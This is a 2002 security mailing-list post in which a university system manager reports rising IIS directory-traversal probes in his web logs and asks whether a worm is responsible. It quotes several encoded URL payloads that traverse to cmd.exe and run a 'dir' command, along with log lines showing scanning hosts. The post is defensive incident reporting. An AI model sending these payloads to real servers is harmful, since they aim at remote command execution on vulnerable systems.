increasing cmd.exe port 80/tcp probes

Jeff Anderson-Lee jonah at eecs.berkeley.edu
Sun Jun 2 17:04:37 GMT 2002


Starting on Jan 5, 2002 I've been noticing some particular probes
appearing regularly in my apache logs.  There are two patterns of
note.  The first is a single probe:

    "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"

and the second is a pair of probes:

    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"
    "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"

At first, seeing a new host with these one of these probe patterns was a
weekly event, then later about once a day.  However in the past thirty-six
hours I've started to see a sudden rise in the incidence of new hosts
scanning with the first pattern:

dlp:X.uniweb.net.co [200.24.X.X] - - [31/May/2002:22:39:46 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:136.145.X.X [136.145.X.X] - - [31/May/2002:22:43:07 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.tricornet.com [207.190.X.X] - - [31/May/2002:23:12:43 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.stny.rr.com [24.169.X.X] - - [31/May/2002:23:31:09 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.mfr.com [216.223.X.X] - - [01/Jun/2002:05:50:48 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.losangeles-ics.com [63.68.X.X] - - [01/Jun/2002:05:55:26 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.aplikacie.sk [212.55.X.X] - - [01/Jun/2002:07:51:02 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.globetrotter.net [142.169.X.X] - - [01/Jun/2002:11:51:16 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.encompserv.com [63.160.X.X] - - [01/Jun/2002:14:11:48 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.k12.al.us [216.109.X.X] - - [01/Jun/2002:21:08:52 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.atl.client2.attbi.com [24.98.X.X] - - [01/Jun/2002:21:27:15 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:208.255.X.X [208.255.X.X] - - [01/Jun/2002:21:35:05 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:128.173.X.X [128.173.X.X] - - [02/Jun/2002:04:53:12 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))


Has anyone else noticed these patterns in their logs?  
Does anyone know if a virus/worm has been identified with this
probing pattern?

Jeff Anderson-Lee
System Manager, Digital Library Project
ERL, UC Berkeley




More information about the unisog mailing list